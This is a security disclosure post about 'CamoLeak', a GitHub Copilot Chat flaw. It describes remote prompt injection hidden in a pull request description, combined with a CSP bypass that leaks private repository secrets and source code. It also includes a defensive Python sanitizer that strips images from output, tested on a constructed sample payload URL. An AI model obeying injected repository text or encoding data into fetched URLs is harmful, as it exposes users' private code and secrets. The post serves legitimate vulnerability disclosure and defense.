
CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source Code


Get details on our discovery of a critical vulnerability in GitHub Copilot Chat.

TL;DR:

In June 2025, I found a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that allowed silent exfiltration of secrets and source code from private repos, and gave me full control over Copilot’s responses, including suggesting malicious code or links.

The attack combined a novel CSP bypass using GitHub’s own infrastructure with remote prompt injection. I reported it via HackerOne, and GitHub fixed it by disabling image rendering in Copilot Chat completely.
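The fix described above (disabling image rendering in Copilot Chat) works because an image is the one element in a rendered response that triggers an outbound fetch without any user click, and the fetched URL can carry data. As an added illustration, not code from the original post or from GitHub, the following Python post-processor removes Markdown and HTML images from assistant output before it is rendered, and returns the URLs it dropped so they can be logged for detection. The sample response string is constructed for the demo.

```python
import re
from typing import NamedTuple

# Markdown image syntax: ![alt](url "optional title")
MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*(?P<url>[^)\s]+)[^)]*\)')
# Raw HTML <img ...> with a src attribute (responses are often rendered as HTML too)
HTML_IMAGE_WITH_SRC = re.compile(
    r'<img\b[^>]*?\bsrc\s*=\s*["\']?(?P<url>[^"\'\s>]+)[^>]*>', re.IGNORECASE)
# Any remaining <img> tag, even one without src, is dropped as well
HTML_IMAGE_ANY = re.compile(r'<img\b[^>]*>', re.IGNORECASE)


class Sanitized(NamedTuple):
    text: str            # response with every image element removed
    removed_urls: list   # URLs that would have been fetched on render


def strip_images(markdown: str) -> Sanitized:
    """Remove image elements from assistant output so rendering it cannot
    cause an outbound request that encodes data in the URL."""
    removed = []

    def _drop(match):
        removed.append(match.group('url'))
        return ''

    text = MD_IMAGE.sub(_drop, markdown)
    text = HTML_IMAGE_WITH_SRC.sub(_drop, text)
    text = HTML_IMAGE_ANY.sub('', text)
    return Sanitized(text, removed)


# Constructed sample response: one Markdown image whose URL carries a
# payload in a query string, one HTML image, and an ordinary link that
# must survive sanitization because it only loads on a user click.
SAMPLE_RESPONSE = (
    "Here is the summary of the pull request.\n\n"
    "![status](https://img.example/track?d=BASE64DATA)\n"
    '<img src="https://img.example/p.png" alt="x">\n'
    "See the [docs](https://docs.example) for details.\n"
)

if __name__ == "__main__":
    result = strip_images(SAMPLE_RESPONSE)
    print(result.text)
    print("blocked fetches:", result.removed_urls)
```

Hyperlinks are deliberately left in place: they are still a phishing vector, but they require a click, whereas an image fetch fires the moment the response is displayed.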

Background

GitHub Copilot Chat is an AI assistant built into GitHub that helps developers by answering questions, explaining code, and suggesting implementations directly in their workflow.

Copilot Chat is context-aware: it can use information from the repository (such as code, commits, or pull requests) to provide tailored answers.

As always, more context = more attack surface.

Finding the prompt injection

As mentioned earlier, GitHub Copilot is context-aware - so I set out to make it notice me. To do this, I embedded a prompt directed at Copilot inside a pull request description.
